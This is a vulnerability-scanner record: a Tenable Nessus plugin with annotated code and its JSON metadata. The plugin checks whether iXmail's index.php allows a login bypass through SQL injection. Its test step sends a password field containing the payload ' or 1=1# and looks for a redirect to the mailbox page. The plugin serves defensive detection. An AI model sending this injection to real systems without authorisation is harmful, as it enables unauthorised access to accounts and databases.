ID IXMAIL_SQL_INJECTION.NASL Type nessus Reporter This script is Copyright (C) 2003-2021 Tenable Network Security, Inc. Modified 2003-06-27T00:00:00
Description
The remote host is running the iXmail webmail interface.
There is a flaw in this interface that allows an attacker to log in
as any user by using a SQL injection flaw in the code of index.php.
An attacker may use this flaw to gain unauthorized access on this
host, or to gain the control of the remote database.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration pass: when the scanner loads the plugin with `description` set,
# only the metadata below is recorded and the script exits before any traffic
# is sent to the target.
if (description)
{
  # --- Identity and external references ---
  script_id(11782);
  script_version("1.22");
  script_bugtraq_id(8047);

  script_name(english:"iXmail index.php password Parameter SQL Injection");

  # --- Report text shown to the operator ---
  script_set_attribute(attribute:"synopsis", value:
"The remote web server is vulnerable to a SQL injection attack." );
  script_set_attribute(attribute:"description", value:
"The remote host is running the iXmail webmail interface.
There is a flaw in this interface that allows an attacker to log in
as any user by using a SQL injection flaw in the code of index.php.
An attacker may use this flaw to gain unauthorized access on this
host, or to gain the control of the remote database." );
  script_set_attribute(attribute:"solution", value:
"Upgrade to iXMail 0.4." );

  # --- Severity (CVSS v2) and exploitability metadata ---
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # --- Plugin lifecycle ---
  script_set_attribute(attribute:"plugin_publication_date", value: "2003/06/27");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_summary(english: "Checks for iXMail");
  # NOTE(review): the test section submits a login request carrying an
  # authentication-bypass value, which is more intrusive than passive
  # fingerprinting -- confirm ACT_GATHER_INFO is the intended category.
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.");

  script_family(english: "CGI abuses");

  # --- Scheduling: prerequisites, ports, and knowledge-base gates ---
  # Runs after service discovery and HTTP version detection, only where a web
  # service and PHP were recorded, and never when CGI scanning is disabled.
  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}
# The script code starts here
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
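# Pick the HTTP port to test, falling back to 80 when none was registered.
port = get_http_port(default:80);

# Stop early on a closed port or a server that does not appear to host PHP.
if(!get_port_state(port)) exit(0);
if(!can_host_php(port:port)) exit(0);

# Login form body: a random six-letter user name (presumably so a successful
# login cannot be explained by a real account) and a password field carrying
# a URL-encoded always-true SQL condition.
name = rand_str(charset: "aegijlnoprsvw", length: 6);
data = "username="+name+"&password=%27+or+1%3D1%23&login=Login";

h = make_array("Content-Type", "application/x-www-form-urlencoded");
foreach dir ( cgi_dirs() )
{
  # Fix: pass the form body with the POST. The listing built `data` but never
  # handed it to http_send_recv3, so the request went out with an empty body
  # and the login form was never exercised -- a silent false negative.
  r = http_send_recv3(port: port, method: 'POST', item: dir+"/index.php", data: data, add_headers: h);
  if (isnull(r)) exit(0);

  # r[1] is the response header block. A redirect to the mailbox page after
  # submitting a random user name indicates the password check was bypassed.
  if(egrep(pattern:"^Location: ixmail_box\.php", string: r[1]))
  {
    security_hole(port);
    # Record the finding in the knowledge base for other plugins and reports.
    set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
    exit(0);
  }
}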
{"id": "IXMAIL_SQL_INJECTION.NASL", "bulletinFamily": "scanner", "title": "iXmail index.php password Parameter SQL Injection", "description": "The remote host is running the iXmail webmail interface. \n\nThere is a flaw in this interface that allows an attacker to log in\nas any user by using a SQL injection flaw in the code of index.php. \n\nAn attacker may use this flaw to gain unauthorized access on this\nhost, or to gain the control of the remote database.", "published": "2003-06-27T00:00:00", "modified": "2003-06-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/11782", "reporter": "This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.", "references": [], "cvelist": [], "type": "nessus", "lastseen": "2021-01-20T11:36:06", "edition": 22, "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2021-01-20T11:36:06", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-01-20T11:36:06", "rev": 2}, "vulnersScore": -0.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(11782);\n script_version(\"1.22\");\n script_bugtraq_id(8047);\n \n script_name(english:\"iXmail index.php password Parameter SQL Injection\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is vulnerable to a SQL injection attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running the iXmail webmail interface. \n\nThere is a flaw in this interface that allows an attacker to log in\nas any user by using a SQL injection flaw in the code of index.php. 
\n\nAn attacker may use this flaw to gain unauthorized access on this\nhost, or to gain the control of the remote database.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to iXMail 0.4.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/06/27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english: \"Checks for iXMail\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.\");\n \n script_family(english: \"CGI abuses\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n# The script code starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nif(!get_port_state(port)) exit(0);\nif(!can_host_php(port:port)) exit(0);\n\nname = rand_str(charset: \"aegijlnoprsvw\", length: 6);\ndata = \"username=\"+name+\"&password=%27+or+1%3D1%23&login=Login\";\n\nh = make_array(\"Content-Type\", \"application/x-www-form-urlencoded\");\nforeach dir ( cgi_dirs() )\n{\n r = http_send_recv3(port: port, method: 'POST', item: dir+\"/index.php\", add_headers: h);\n if (isnull(r)) exit(0);\n if(egrep(pattern:\"^Location: ixmail_box\\.php\", string: r[1]))\n {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n 
}\n}\n", "naslFamily": "CGI abuses", "pluginID": "11782", "cpe": [], "scheme": null}